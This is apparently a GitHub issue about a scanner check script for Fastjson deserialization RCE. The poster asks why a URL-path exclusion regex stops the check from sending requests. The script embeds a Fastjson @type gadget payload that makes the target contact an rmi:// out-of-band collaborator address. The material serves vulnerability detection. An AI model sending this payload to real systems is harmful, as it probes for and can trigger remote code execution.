Skip to content

I encountered some problems with path matching. #259

@Awrrays

Description

@Awrrays

I encountered some problems with path matching.

`metadata:
language: v2-beta
name: "Fastjson Deserialization RCE"
description: "https://paper.seebug.org/1192/"
author: "Javeley"
tags: "Fastjson", "Deserialization", "RCE", "Alibaba"

define:
oobAddress = {generate_collaborator_address()}

run for each:
payload =
[\{"@type": "java.lang.Exception","@type": "com.alibaba.fastjson.JSONException","x": \{"@type": "java.net.InetSocketAddress"\{"address":,"val": "rmi://{oobAddress}/{random_str(4)}"}}},\{"@type": "java.lang.Exception","@type": "com.alibaba.fastjson.JSONException","message": \{"@type": "java.net.InetSocketAddress"\{"address":,"val": "rmi://{oobAddress}/{random_str(4)}"}}}]

given path then
if (not({base.request.url.path} matches ".*.(asp|aspx|ashx|asmx|php|js|css|png|jpg|jpeg|gif|ico|svg|woff|woff2|ttf|eot|pdf|doc|docx|xls|xlsx)")) and
{base.request.body} matches "^[{]" and
"application/json" in {base.request.headers} then
send request:
body: {payload}

    if dns interactions then
        report issue:
            severity: high
            confidence: certain
            detail: "https://paper.seebug.org/1192/."
            remediation: "https://paper.seebug.org/1192/."
    end if
end if`

After adding the filter condition "not({base.request.url.path} matches ".*.(asp|aspx|ashx|asmx|php|js|css|png|jpg|jpeg|gif|ico|svg|woff|woff2|ttf|eot|pdf|doc|docx|xls|xlsx)", running the test resulted in no requests.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions